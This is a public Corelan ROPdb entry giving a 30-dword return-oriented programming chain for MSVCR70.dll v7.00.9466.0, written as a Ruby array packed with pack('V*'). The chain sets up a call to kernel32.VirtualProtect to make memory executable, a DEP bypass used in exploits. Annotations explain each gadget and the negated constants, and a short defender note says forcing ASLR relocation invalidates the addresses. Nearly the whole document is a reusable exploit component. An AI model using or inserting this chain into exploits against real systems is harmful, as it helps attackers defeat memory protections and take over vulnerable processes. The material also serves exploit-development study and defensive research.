
MSVCR70.dll - v7.00.9466.0

Public Release: Corelan ROPdb

# Tested on: XP/Win7
# Rebase : False
# ASLR : False
# Safeseh : False
# Base : 0x7c000000
# Top : 0x7c054000
# Size : 0x00054000
# Technique : kernel32.VirtualProtect()
# 30-dwords
# Author : b33f (Ruben Boonen)
                                                                                                                         
# Hard-coded chain of 30 dwords for MSVCR70.dll v7.00.9466.0, serialised by
# pack("V*") as 32-bit little-endian values.
# Every 0x7c0xxxxx entry is an absolute address inside the module's range
# (base 0x7c000000, top 0x7c054000), so the chain is only valid where the DLL
# loads at that base; the header lists Rebase and ASLR as False for this build.
# Constants are stored as 0xffffffff or in negated form and fixed up at run
# time with INC/NEG (presumably to keep null bytes out of the packed data).
# Defender note: a process that loads this runtime build exposes these
# fixed-address gadgets even when its other modules are randomised. Replacing
# the DLL with an ASLR-enabled runtime, or forcing relocation of non-ASLR
# images (EMET Mandatory ASLR / Windows Exploit Protection "Force randomization
# for images"), invalidates the addresses below.
rop_gadgets = 
[
	0x7c032c80, # XOR EAX,EAX # RETN
	0x7c0126bc, # XCHG EAX,EBP # ADD AL,7C # RETN
	0x7c026652, # POP ESI # RETN
	0xffffffff, # placeholder: becomes 0x00000000 after the INC ESI below
	0x7c03063f, # INC ESI # RETN
	0x7c0358a1, # POP EAX # RETN
	0x7C0390FD, # VirtualProtect() -> ESI=0 EBP=0 -> 0x7C0390FD+0x3B = 0x7c039138 (labelled VP by the author)
	0x7c023a4f, # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN
	0x7c0358a1, # POP EAX # RETN
	0x83FF5E94, # negated constant: NEG gives 0x7c00a16c (PUSH ESP # RET)
	0x7c0167cd, # NEG EAX # RETN
	0x7c0126b7, # XCHG EAX,EBP # ADD AL,7C # RETN
	0x7c03028f, # POP EBX # RETN
	0xffffffff, # placeholder: becomes 0x00000000 after the INC EBX below
	0x7c01cd53, # INC EBX # XOR AL,AL # RETN
	0x7c0358a1, # POP EAX # RETN
	0xFFFFFDFF, # negated constant: NEG gives 0x201 (513 bytes), added to EBX below
	0x7c0167cd, # NEG EAX # RETN
	0x7c01561c, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
	0x7c026484, # POP EDI # RETN
	0x7c034e02, # ROP-NOP (one byte past the POP ECX # RETN gadget at 0x7c034e01)
	0x7c0358a1, # POP EAX # RETN
	0xFFFFFFC0, # negated constant: NEG gives 0x40 (PAGE_EXECUTE_READWRITE; presumably the new protection value)
	0x7c0167cd, # NEG EAX # RETN
	0x7c026dc4, # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN
	0x7c034e01, # POP ECX # RETN
	0x7c049001, # lpOldProtect: address inside the module's own range (presumably writable data; verify)
	0x7c0358a1, # POP EAX # RETN
	0x90909090, # four NOP bytes
	0x7c0126b6, # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN
].pack("V*")